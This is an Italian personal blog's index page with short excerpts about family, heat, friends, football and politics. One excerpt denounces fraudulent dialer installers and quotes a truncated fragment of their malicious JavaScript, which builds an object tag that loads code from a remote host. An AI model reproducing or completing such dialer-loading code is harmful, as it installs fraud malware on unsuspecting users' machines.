Una sola mattinata saheliana e si torna alla normalità. Babbo rientra dall’ospedale, la Arosa ritorna in servizio così come il PC, forte del suo service Pack 2. Sto preparando documenti per le ferie montane… non vedo l’ora di riposare con un po’ di fresco. Allo stesso modo, mi avvicino al 30 giugno senza certezze sul […]

Read More →

ospedale, officina, laboratorio, uffici postali. Innumerevoli commissoni e via vai frenetico. Piccolo particolare: fa un caldo bestia. Poca voglia di scrivere. Potrei parlare delle videocamere, dei settori dello stadio che ogni tanto cambiano forma e prezzo, dei vari siti in fieri (qualcuno arriva addirittura per procura!), del torneo aziendale quest’anno all’Arena. Oppure divagare su Solari […]

Read More →

Aperitivo e pizza per 21 (!) Risate assortite e giro turistico notturno di Sacconago, per smaltire il malloppo. Riaccompagno Luca e Miriam a Legnano; invito il DR, un po’ spaesato, a seguirmi sulla strada per Arluno. Come 8 anni fa, nel bel mezzo dell’incrocio di Porta Venezia, un rumore di ferraglia turba la nostra mezzanotte […]

Read More →

Romania, fine luglio 1994. Uno dei paesi più arretrati d’Europa ci offriva il peggio di sé: un ufficio postale affollatissimo, tutto a vetrate, esposto al solleone, un solo sportello aperto. Aria irrespirabile, ci davamo il turno in fila; quandosi iniziava a boccheggiare, si chiedeva il cambio. Lo spettacolo di Milano sveglia, viva e in movimento […]

Read More →

Da stamattina non faccio altro: tutti vogliono la foto con la Coppa. E’ un piacere poi scegliere le foto migliori dei festeggiamenti con Facch3tti: ha un senso dello humour semplicemente squisito. Ironia velenosa su un dirigente nerazzurro che: non c’entra nulla, non ha fatto nulla, non è tesserato FIGC, non doveva esserci ma compare regolarmente […]

Read More →

Faccio mia la mobilitazione del Capitano e di Rebo76. In questi giorni ho traccheggiato, festeggiato. Mangiato e trincato. La mia vita è felice, fuori è quasi estate. Ma il mondo è difficile, crudele, spietato. Basta egotismo, basta provincialismo *popolo bue*!! A sensibilizzarmi ci pensa concretamente Milano Young. La presa di coscienza è iniziata lo scorso […]

Read More →

Sabato si è ri-rotta la scheda madre del PC del mio babbo. Mah! Il costo italiano di connessione ADSL è tra i più alti in europa. Cattiva notizia, ma almeno quegli infami (poveracci) che campano installando delittuosi dialer la finiranno con porcate come questa, var str=new Array(8); str[1]=”ECT id=A codeBase=’http://deposito.hostance.net/dia”; str[0]=”

Read More →

L’Italia si slancia con accidia nel medioevo “limitatamente alle parole” [Sì] o [non voto perché la materia è complessa] o [meglio questo che il far west] Ma per me è un periodo molto felice e divertente; sabato grigliata per 10 e, poche ore fa, aperitivo per 16. Quasi tutte le persone a me più care […]

Read More →